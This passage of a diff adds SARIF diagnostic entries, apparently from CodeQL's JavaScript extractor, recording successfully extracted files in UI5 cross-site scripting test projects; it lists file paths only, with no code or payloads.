} + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ 
{ + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ 
{ + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + 
"text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + 
"properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 301 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" 
: { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, 
+ "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" 
: { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + 
} + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 